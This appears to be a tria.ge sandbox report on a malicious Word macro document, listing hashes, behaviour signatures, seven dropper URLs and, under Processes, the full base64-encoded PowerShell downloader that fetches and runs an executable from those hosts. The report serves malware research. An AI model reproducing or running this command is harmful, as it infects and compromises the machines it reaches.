Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    28/05/2024, 17:51

General

  • Target

    7dd794241f86015441d52f50b8115922_JaffaCakes118.doc

  • Size

    158KB

  • MD5

    7dd794241f86015441d52f50b8115922

  • SHA1

    2bca5c7ac169499193cc24637a83453481a718c0

  • SHA256

    5331ea5ad449f1402737c6cfe0f9249a582b986ec49743db376e79c59e59ecbb

  • SHA512

    cd4a0b5da102d664601f5001f8753100e01de12c20d3e17a21e8fa047c2caff6873344f18cf586509e6e4fb0a726db6f88839ee821037a641f15ae55c0a38cd5

  • SSDEEP

    1536:+iaqasrdi1Ir77zOH98Wj2gpngx+a93xRiqLE8ct2PU7eXKSSxH5ppJxUFW5:+0rfrzOH98ipgfkJxUFW5

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://77yxx.com/b5rh/bZxS/

exe.dropper

http://shahramookht.com/t1k12k7t/8jq/

exe.dropper

http://www.aciitaly.com/adminer-master/gkI/

exe.dropper

https://codelta.es/images/9S35FR/

exe.dropper

https://burstoutloud.com/PPL/Hf/

exe.dropper

https://targetin.com/Silder-1/naK/

exe.dropper

http://dbestfishing.com.sg/67s/wfe/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 11 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7dd794241f86015441d52f50b8115922_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -encod JABJADMAbAB1AGcAZwB2AD0AKAAnAEUAYgAnACsAKAAnAHUAJwArACcAXwBsAHMAJwApACsAJwB2ACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBzAGUAcgBwAFIATwBmAEkAbABFAFwAVQBpAEgAaABhAF8AbABcAGYAcQBGAEsAYgBxADQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAHIARQBjAFQAbwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAHUAUgBJAHQAeQBgAFAAYABSAG8AdABvAGMAYABvAGwAIgAgAD0AIAAoACcAdABsACcAKwAnAHMAMQAnACsAKAAnADIALAAgAHQAJwArACcAbAAnACsAJwBzADEAMQAsACAAJwApACsAKAAnAHQAbAAnACsAJwBzACcAKQApADsAJABGAF8AegB3AGYAcgBrACAAPQAgACgAKAAnAEgAJwArACcAcwByADcAdwAnACsAJwBtACcAKQArACcAaAAnACsAJwBkAHQAJwApADsAJABRAGQANABnAHkAMwBnAD0AKAAnAEgAbwAnACsAJwBnADEAJwArACgAJwAwAHYAJwArACcAeQAnACkAKQA7ACQAQgA1ADEANQB1ADAAcgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAE8AJwArACcAZwBpAFUAaQAnACkAKwAoACcAaABoAGEAJwArACcAXwAnACkAKwAoACcAbAAnACsAJwBPAGcAaQAnACkAKwAoACcARgBxACcAKwAnAGYAawAnACsAJwBiAHEANABPACcAKQArACcAZwBpACcAKQAgAC0AcgBFAFAAbABhAGMAZQAgACgAJwBPACcAKwAnAGcAaQAnACkALABbAGMAaABBAHIAXQA5ADIAKQArACQARgBfAHoAdwBmAHIAawArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQAQQBfAHEAbABiADEANgA9ACgAKAAnAFoAJwArACcAdABfADkAJwApACsAJwBrADAAJwArACcAdQAnACkAOwAkAFMANgBfAG4AbgA3AGEAPQAuACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQB0AC4AdwBFAEIAQwBMAGkARQBOAFQAOwAkAFQAeAAyADMAXwBhAGQAPQAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwADoAJwApACsAKAAnAC8AJwArACcALwA3ACcAKQArACcANwAnACsAKAAnAHkAJwArACcAeAB4ACcAKQArACcALgBjACcAKwAoACcAbwBtAC8AJwArACcAYgAnACkAKwAoACcANQByACcAKwAnAGgALwBiAFoAeABTACcAKwAnAC8AJwApACsAKAAnACoAaAB0AHQAcAAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AcwAnACkAKwAnAGgAYQAnACsAKAAnAGgAcgAnACsAJwBhAG0AbwBvACcAKwAnAGsAaAB0ACcAKQArACcALgBjACcAKwAoACcAbwBtAC8AdAAnACsAJwAxAGsAJwApACsAKAAnADEAMgBrACcAKwAnADcAJwApACsAJwB0AC8AJwArACgAJwA4ACcAKwAnAGoAcQAvACcAKQArACcAKgBoACcAKwAoACcAdAB0AHAAOgAnACsAJwAvAC8AJwApACsAKAAnAHcAdwB3AC4AYQBjACcAKwAnAGkAJwArACcAaQAnACsAJwB0AGEAbAAnACkAKwAoACcAeQAnACsAJwAuAGMAbwBtACcAKwAnAC8AJwApACsAJwBhAGQAJwArACcAbQAnACsAKAAnAGkAbgAnACsAJwBlAHIALQBtAGEAcwAnACsAJwB0ACcAKQArACgAJwBlACcAKwAnAHIALwBnAGsAJwApACsAJwBJACcAKwAoACcALwAnACsAJwAqAGgAJwApACsAJwB0AHQAJwArACcAcABzACcAKwAnADoAJwArACgAJwAvAC8AYwAnACsAJwBvACcAKQArACgAJwBkAGUAbAB0ACcAKwAnAGEAJwApACsAJwAuACcAKwAoACcAZQAnACsAJwBzAC8AJwApACsAJwBpACcAKwAoACcAbQAnACsAJwBhAGcAZQBzAC8AJwArACcAOQBTADMANQAnACsAJwBGAFIAJwApACsAJwAvACoAJwArACgAJwBoAHQAdABwAHMAOgAvAC8AYgAnACsAJwB1AHIAJwArACcAcwAnACsAJwB0AG8AdQAnACkAKwAoACcAdAAnACsAJwBsAG8AdQBkACcAKwAnAC4AYwBvAG0ALwBQAFAATAAvAEgAZgAvACoAJwArACcAaAAnACsAJwB0ACcAKwAnAHQAcAAnACsAJwBzADoAJwApACsAKAAnAC8ALwAnACsAJwB0AGEAJwApACsAKAAnAHIAZwAnACsAJwBlAHQAaQAnACsAJwBuAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AUwBpACcAKQArACgAJwBsAGQAZQByAC0AMQAvACcAKwAnAG4AYQAnACsAJwBLAC8AJwArACcAKgBoAHQAdAAnACsAJwBwACcAKQArACcAOgAvACcAKwAoACcALwBkACcAKwAnAGIAJwArACcAZQBzAHQAZgBpAHMAJwApACsAKAAnAGgAaQBuACcAKwAnAGcALgBjAG8AbQAnACsAJwAuACcAKwAnAHMAZwAnACkAKwAoACcALwA2ADcAJwArACcAcwAvAHcAJwApACsAKAAnAGYAZQAnACsAJwAvACcAKQApAC4AIgBTAGAAcABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEEANgB2AHIAXwBhAG8APQAoACgAJwBWACcAKwAnAHQAaABoACcAKQArACgAJwAyACcAKwAnAHYAdQAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEsAdgB4AGkAZAA1AHQAIABpAG4AIAAkAFQAeAAyADMAXwBhAGQAKQB7AHQAcgB5AHsAJABTADYAXwBuAG4ANwBhAC4AIgBEAE8AVwBOAGAATABvAGEAYABkAEYASQBgAEwAZQAiACgAJABLAHYAeABpAGQANQB0ACwAIAAkAEIANQAxADUAdQAwAHIAKQA7ACQARgBpAG0AaQB5AGgAawA9ACgAKAAnAEcAdQAnACsAJwBoACcAKQArACgAJwBmACcAKwAnADQAagB0ACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEIANQAxADUAdQAwAHIAKQAuACIAbABlAGAATgBHAHQASAAiACAALQBnAGUAIAAyADYANgA1ADMAKQAgAHsAJgAoACcASQAnACsAJwBuAHYAbwBrAGUAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAoACQAQgA1ADEANQB1ADAAcgApADsAJABaAHoAZABhAGcAcABhAD0AKAAnAFIAJwArACgAJwBzACcAKwAnAHQAdAAnACkAKwAoACcAeQAnACsAJwB0AG8AJwApACkAOwBiAHIAZQBhAGsAOwAkAEMAegBjAHgAbQB1ADUAPQAoACgAJwBSACcAKwAnAGkAcAAnACkAKwAoACcANABqACcAKwAnADAAJwApACsAJwB1ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwBuADIANwBxADYAYgA9ACgAJwBJAHgAJwArACgAJwBfADEAMgBuACcAKwAnAHYAJwApACkA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2672

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      fcacdf583558189c0f11b16d1b8b592b

      SHA1

      e40bfbd8f8d38b687ef71f8a1b7d3e14769e5020

      SHA256

      ff9ac5e367a9542c11156a4e1c14bb57d63b8da9b13254659af304bd1bda200e

      SHA512

      1734c26c317b9688d7e99c9a7301f72355357f033a67ef7d24e08e81d44c363f04bacb1848360ecf802c372de1d24a13d11a7cda6723ad7f8ac7b984c6061b81

    • memory/2368-24-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-0-0x000000002FC21000-0x000000002FC22000-memory.dmp

      Filesize

      4KB

    • memory/2368-6-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-7-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-20-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-19-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-18-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-17-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-16-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-15-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-14-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-13-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-12-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-11-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-10-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-9-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-2-0x000000007168D000-0x0000000071698000-memory.dmp

      Filesize

      44KB

    • memory/2368-8-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-28-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-27-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-26-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-25-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-23-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-22-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-21-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-31-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-30-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-36-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-64-0x000000007168D000-0x0000000071698000-memory.dmp

      Filesize

      44KB

    • memory/2368-63-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2368-44-0x000000007168D000-0x0000000071698000-memory.dmp

      Filesize

      44KB

    • memory/2368-45-0x0000000000720000-0x0000000000820000-memory.dmp

      Filesize

      1024KB

    • memory/2368-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2672-38-0x0000000002810000-0x0000000002818000-memory.dmp

      Filesize

      32KB

    • memory/2672-37-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

      Filesize

      2.9MB